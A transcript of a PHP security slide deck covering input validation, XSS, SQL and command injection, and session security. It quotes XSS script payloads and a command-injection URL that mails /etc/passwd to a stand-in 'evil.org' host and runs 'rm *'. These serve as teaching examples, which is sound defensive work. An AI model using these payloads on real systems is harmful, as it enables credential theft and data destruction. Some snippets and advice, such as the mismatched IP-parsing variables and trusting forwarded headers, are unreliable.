php security
TRANSCRIPT
![Page 2: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/2.jpg)
What is Security?
measurement…
safety…
protection…
![Page 3: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/3.jpg)
Secure Web Applications
web security issues have to do with:– hacker attacks
• denial of service
• server hijacking
– common threats– compromise of data
![Page 4: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/4.jpg)
PHP & Security
a growing language…
a major concern…
![Page 5: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/5.jpg)
Never trust the web…
Input data validation– register_globals = OFF– $_REQUEST[] big NO NO …– type casting input data
• No isNumeric() if data is numeric [locale problem]• regularExp if data is string
– Path validation• Always use basename()
![Page 6: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/6.jpg)
Never trust the web…
• Content size validation– use server side max length validation
– File Upload• Check destination file size with $_FILES[‘name’][‘size’]• I think Browser MIME header is reliable right ?
– Use getImageSize() in case of image
• External source upload like Avtar– Make a local copy if path/of/file submitted from a URL.
![Page 7: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/7.jpg)
XSS attack
– Can lead to embarrassment.– Session take-over.– Password theft.– User tracking by 3rd parties
![Page 8: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/8.jpg)
XSS attack
Prevention is better than cure– Use striptags()
• No tag allowance please
– Use htmlentities()– Is $_SERVER safe ?
• Can be set…• Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo• $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo;• $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo
– IP based info• Use HTTP_X_FORWARDED_FOR• Use long2ip()
– $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]);– $sValidIp = long2ip(ip2long(array_pop($ipss)));
![Page 9: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/9.jpg)
SQL Injection
WWW
– Arbitrary query execution– Removal of data.– Modification of existing values.– Denial of service.– Arbitrary data injection.
![Page 10: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/10.jpg)
Preventing SQL injection
• Are magic quotes enough?– use mysql_real_escape_string()– use prepared statements– avoid omitting single quotes– LIKE quandary need addslashes()– avoid printing query– Authentication data storage
• Encrypt sensitive data to access database• Make sure it’s only loaded for certain VirtualHost
![Page 11: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/11.jpg)
Authentication Data Storage
SetEnv DB_LOGIN “login”SetEnv DB_PASSWD “password”Set Env DB_HOST “127.0.0.7”
<virtualHost iila.ws> include /home/illa/sql.conf</virtualHost>
$_SERVER[‘DB_LOGIN’]$_SERVER[‘DB_PASSWD’]
/home/illa/sql.conf Apache server configuration
PHP file
Better Approach is to set these things under php’s ini directives use php_admin_value mysql.default.user. “login”
![Page 12: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/12.jpg)
Preventing code injection
– Path validation– Validate fileName
$sFile = “D\’sozaRes.doc’;
basename($sFile); //will return D\’sozaRes.doc on *nix systembasename($sFile); //will return ’sozaRes.doc on win32
• Remove slashes• Keep white list of file name• Use full path
– Avoid variables in eval()– Avoid using variable passed by users for regEx.
![Page 13: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/13.jpg)
Command injection
– Use escapeshellcmd () and escapeshellarg()
– Use full path for command– Set prority and memory limit for command
• shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);
![Page 14: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/14.jpg)
Calling External Programs
<?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?>
The user could control $to to yield:
http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A
which would result in running the command:
/usr/sbin/sendmail -i [email protected] /etc/passwd; rm *
a solution would be:
$fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
![Page 15: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/15.jpg)
Securing sessions
• Weakness of session– Server side weakness…
• ls –l /tmp/sess_* //can reveal session info
– URL session exploitation
• Solution– Native protection.– Mixing security and convenience. – Securing session storage path– Check browser signature– Referrer validation
![Page 16: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/16.jpg)
Questions…????
![Page 17: Php security](https://reader036.vdocument.in/reader036/viewer/2022062407/55d1b4a9bb61eb80728b45fc/html5/thumbnails/17.jpg)
Thank You !!